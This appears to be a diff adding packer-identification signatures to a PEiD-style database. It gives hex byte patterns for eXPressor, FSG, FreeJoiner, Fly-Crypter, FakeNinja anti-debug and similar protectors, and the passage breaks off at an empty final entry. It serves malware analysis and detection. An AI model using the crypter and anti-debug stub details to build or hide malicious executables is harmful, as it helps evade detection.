+[eXPressor v1.2.0b]
+signature = 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? 00 2B 05 84 ?? ?? 00 A3 ?? ?? ?? 00 83 3D ?? ?? ?? 00 00 74 16 A1 ?? ?? ?? 00 03 05 80 ?? ?? 00 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? 00 01 00 00 00 68 04
+ep_only = false
+
+[eXPressor v1.3 -> CGSoftLabs]
+signature = 45 78 50 72 2D 76 2E 31 2E 33 2E
+ep_only = false
+
+[eXPressor V1.3 -> CGSoftLabs]
+signature = 55 8B EC 83 EC ?? 53 56 57 EB 0C 45
+ep_only = true
+
+[eXPressor v1.3 -> CGSoftLabs]
+signature = 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 33 2E 2E B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 13 A1 ?? ?? ?? ?? 03 05 ?? ?? ?? ?? 89 ?? ?? E9 ?? ?? 00 00 C7 05
+ep_only = true
+
+[eXPressor v1.4 -> CGSoftLabs]
+signature = 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 34 2E 2E B8
+ep_only = true
+
+[eXPressor v1.4 -> CGSoftLabs]
+signature = 65 58 50 72 2D 76 2E 31 2E 34 2E
+ep_only = false
+
+[eXpressor v1.4.5 -> CGSoftLabs]
+signature = 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C
+ep_only = true
+
+[eXPressor V1.4.5.1 -> CGSoftLabs]
+signature = 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? 00 05 00 ?? ?? 00 A3 08 ?? ?? 00 A1 08 ?? ?? 00 B9 81 ?? ?? 00 2B 48 18 89 0D 0C ?? ?? 00 83 3D
+ep_only = true
+
+[eXPressor v1.4.5.1 -> CGSoftLabs]
+signature = 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14
+ep_only = true
+
+[eXPressor v1.4.5.1 -> CGSoftLabs]
+signature = 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 89 4D CC
+ep_only = true
+
+[eXPressor.PacK 1.5.0.X -> CGSoftLabs]
+signature = 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 83 A5 ?? ?? ?? ?? ?? F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 35 2E 00 83 7D 0C ?? 75 23 8B 45 08 A3 ?? ?? ?? ?? 6A 04 68 00 10 00 00 68 20 03 00 00 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? EB 04
+ep_only = true
+
+[eXPressor.Protection 1.5.0.X -> CGSoftLabs]
+signature = EB 01 68 EB 01 ?? ?? ?? ?? 83 EC 0C 53 56 57 EB 01 ?? 83 3D ?? ?? ?? ?? 00 74 08 EB 01 E9 E9 56 01 00 00 EB 02 E8 E9 C7 05 ?? ?? ?? ?? 01 00 00 00 EB 01 C2 E8 E2 05 00 00 EB 02 DA 9F 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF D0 59 59 EB 01 C8 EB 02 66 F0 68 ?? ?? ?? ?? E8 0E 05 00 00 59 EB 01 DD 83 65 F4 00 EB 07 8B 45 F4 40 89 45 F4 83 7D F4 61 73 1F EB 02 DA 1A 8B 45 F4 0F ?? ?? ?? ?? ?? ?? 33 45 F4 8B 4D F4 88 ?? ?? ?? ?? ?? EB 01 EB EB
+ep_only = false
+
+[EZIP v1.0]
+signature = E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C
+ep_only = true
+
+[FACRYPT v1.0]
+signature = B9 ?? ?? B3 ?? 33 D2 BE ?? ?? 8B FE AC 32 C3 AA 49 43 32 E4 03 D0 E3
+ep_only = true
+
+[FakeNinja v2.8 (Anti-Debug) -> Spirit]
+signature = 64 A1 18 00 00 00 EB 02 C3 11 8B 40 30 EB 01 0F 0F B6 40 02 83 F8 01 74 FE EB 01 E8 90 C0 FF FF EB 03 BD F4 B5 64 A1 30 00 00 00 0F B6 40 02 74 01 BA 74 E0 50 00 64 A1 30 00 00 00 83 C0 68 8B 00 EB 00 83 F8 70 74 CF EB 02 EB FE 90 90 90 0F 31 33 C9 03 C8 0F 31 2B C1 3D FF 0F 00 00 73 EA E8 08 00 00 00 C1 3D FF 0F 00 00 74 AA EB 07 E8 8B 40 30 EB 08 EA 64 A1 18 00 00 00 EB F2 90 90 90 BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 11 00 00 6A 00 6A 00 FF 35 70 11 40 00 FF 35 84 11 40 00 E8 25 11 00 00 FF
+ep_only = false
+
+[FakeNinja v2.8 -> Spirit]
+signature = BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40
+ep_only = false
+
+[Feokt]
+signature = 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8
+ep_only = true
+
+[FileShield]
+signature = 50 1E EB ?? 90 00 00 8B D8
+ep_only = true
+
+[Fish PE Shield 1.01 -> HellFish]
+signature = 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 AD FF FF FF 89 45 DC E8 C1 FE FF FF 8B 10 03 55 DC 89 55 E4 83 C0 04 8B 10 89 55 FC 83 C0 04 8B 10 89 55 F4 83 C0 04 8B 10 89 55 F8 83 C0 04 8B 10 89 55 F0 83 C0 04 8B 10 89 55 EC 83 C0 04 8B 00 89 45 E8 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B 46 C7 45 E0 00 00 00 00 83 7B 04 00 74 14
+ep_only = false
+
+[Fish PE Shield 1.01 -> HellFish]
+signature = 60 E8 12 FE FF FF C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 28 88 00 00 40 ?? 4B 00 00 00 02 00 00 00 A0 00 00 18 01 00 00 40 ?? 4C 00 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 40 ?? 4E 00 00 00 00 00 00 00 C0 00 00 40 39 00 00 40 ?? 4E 00 00 00 08 00 00 00 00 01 00 C8 06 00 00 40
+ep_only = true
+
+[Fish PE Shield 1.12/1.16 -> HellFish]
+signature = 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 BD FE FF FF 89 45 DC E8 E1 FD FF FF 8B 00 03 45 DC 89 45 E4 E8 DC FE FF FF 8B D8 BA 8E 4E 0E EC 8B C3 E8 2E FF FF FF 89 45 F4 BA 04 49 32 D3 8B C3 E8 1F FF FF FF 89 45 F8 BA 54 CA AF 91 8B C3 E8 10 FF FF FF 89 45 F0 BA AC 33 06 03 8B C3 E8 01 FF FF FF 89 45 EC BA 1B C6 46 79 8B C3 E8 F2 FE FF FF 89 45 E8 BA AA FC 0D 7C 8B C3 E8 E3 FE FF FF 89 45 FC 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B
+ep_only = false
+
+[Fish PE Shield 1.12/1.16 -> HellFish]
+signature = 60 E8 EA FD FF FF FF D0 C3 8D 40 00 ?? 00 00 00 2C 00 00 00 ?? ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 ?? ?? 00 ?? ?? 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 00 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 40
+ep_only = true
+
+[FishPE V1.0X -> hellfish]
+signature = 60 E8 ?? ?? ?? ?? C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 ?? ?? 00 00 ?? ?? ?? ?? 00 00 02 00 00 00 A0 00 00 18 01 00 00 ?? ?? ?? ?? 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 C0 00 00 40 39 00 00 ?? ?? ?? ?? 00 00 08 00 00 00 00 01 00 C8 06 00 00
+ep_only = true
+
+[FixupPak v1.20]
+signature = 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8
+ep_only = true
+
+[Fly-Crypter 1.0 -> ut1lz]
+signature = 53 56 57 55 BB 2C ?? ?? 44 BE 00 30 44 44 BF 20 ?? ?? 44 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 44 44 00 74 06 FF 15 58 30 44 44 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 20 30 44 44 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 18 30 44 44 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 2F FA FF FF FF 15 24 30 44 44 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 44 00 74 06 FF 15 10 ?? ?? 44 8B 06 50 E8 51 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 44 44 E8 26 FF FF FF C3
+ep_only = false
+
+[Fly-Crypter 1.0 -> ut1lz]
+signature = 55 8B EC 83 C4 F0 53 B8 18 22 44 44 E8 7F F7 FF FF E8 0A F1 FF FF B8 09 00 00 00 E8 5C F1 FF FF 8B D8 85 DB 75 05 E8 85 FD FF FF 83 FB 01 75 05 E8 7B FD FF FF 83 FB 02 75 05 E8 D1 FD FF FF 83 FB 03 75 05 E8 87 FE FF FF 83 FB 04 75 05 E8 5D FD FF FF 83 FB 05 75 05 E8 B3 FD FF FF 83 FB 06 75 05 E8 69 FE FF FF 83 FB 07 75 05 E8 5F FE FF FF 83 FB 08 75 05 E8 95 FD FF FF 83 FB 09 75 05 E8 4B FE FF FF 5B E8 9D F2 FF FF 90
+ep_only = true
+
+[FreeBASIC 0.16b]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 88 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 68 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[FreeCryptor 0.1 (build 001)-> GlOFF]
+signature = 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 68 26 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08
+ep_only = false
+
+[FreeCryptor 0.1 (build 002) -> GlOFF]
+signature = 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 90 68 27 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08
+ep_only = false
+
+[FreeCryptor 0.2 (build 002) -> GlOFF]
+signature = 33 D2 90 1E 68 1B ?? ?? ?? 0F A0 1F 8B 02 90 50 54 8F 02 90 90 8E 64 24 08 FF E2 58 50 33 D2 52 83 F8 01 9B 40 8A 10 89 14 24 90 D9 04 24 90 D9 FA D9 5C 24 FC 8B 5C 24 FC 81 F3 C2 FC 1D 1C 75 E3 74 01 62 FF D0 90 5A 33 C0 8B 54 24 08 90 64 8F 00 90 83 C2 08 52 5C 5A
+ep_only = false
+
+[FreeJoiner 1.5.1 -> GlOFF]
+signature = 90 87 FF 90 90 B9 2B 00 00 00 BA 07 10 40 00 83 C2 03 90 87 FF 90 90 B9 04 00 00 00 90 87 FF 90 33 C9 C7 05 09 30 40 00 00 00 00 00 68 00 01 00 00 68 21 30 40 00 6A 00 E8 B7 02 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 21 30 40 00 E8 8F 02 00 00 A3 19 30 40 00 90 87 FF 90 8B 15 09 30 40 00 81 C2 04 01 00 00 F7 DA 6A 02 6A 00 52
+ep_only = true
+
+[FreeJoiner 1.5.2 (Stub engine 1.6) -> GlOFF]
+signature = E8 46 FD FF FF 50 E8 0C 00 00 00 FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00
+ep_only = true
+
+[FreeJoiner 1.5.3 (Stub engine 1.7) -> GlOFF]
+signature = E8 33 FD FF FF 50 E8 0D 00 00 00 CC FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00
+ep_only = true
+
+[FreeJoiner 1.5.3 (Stub engine 1.7.1) -> GlOFF]
+signature = E8 02 FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A8 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 014-021/024-027) -> GlOFF]
+signature = E8 ?? ?? FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 023) -> GlOFF]
+signature = E8 E1 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 029) -> GlOFF]
+signature = 50 32 C4 8A C3 58 E8 DE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 031/032) -> GlOFF]
+signature = 50 32 ?? 66 8B C3 58 E8 ?? FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 033) -> GlOFF]
+signature = 50 66 33 C3 66 8B C1 58 E8 AC FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[FreeJoiner Small (build 035) -> GlOFF]
+signature = 51 33 CB 86 C9 59 E8 9E FD FF FF 66 87 DB 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = true
+
+[Freshbind v2.0 -> gFresh]
+signature = 64 A1 00 00 00 00 55 89 E5 6A FF 68 1C A0 41 00
+ep_only = true
+
+[Frusion -> biff]
+signature = 83 EC 0C 53 55 56 57 68 04 01 00 00 C7 44 24 14
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.0]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38
+ep_only = true
+
+[FSG v1.1]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> (Watcom C/C++ EXE)]
+signature = EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = E8 01 00 00 00 ?? ?? E8 ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++ 1999)]
+signature = EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++ / ASM)]
+signature = EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)x]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi 2.0)]
+signature = EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32 / Microsoft Visual Basic)]
+signature = F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32)]
+signature = EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic / MASM32)]
+signature = EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic 5.0 / 6.0)]
+signature = C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 4.x / LCC Win32 1.x)]
+signature = 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 5.0 / 6.0)]
+signature = 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0 / ASM)]
+signature = E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
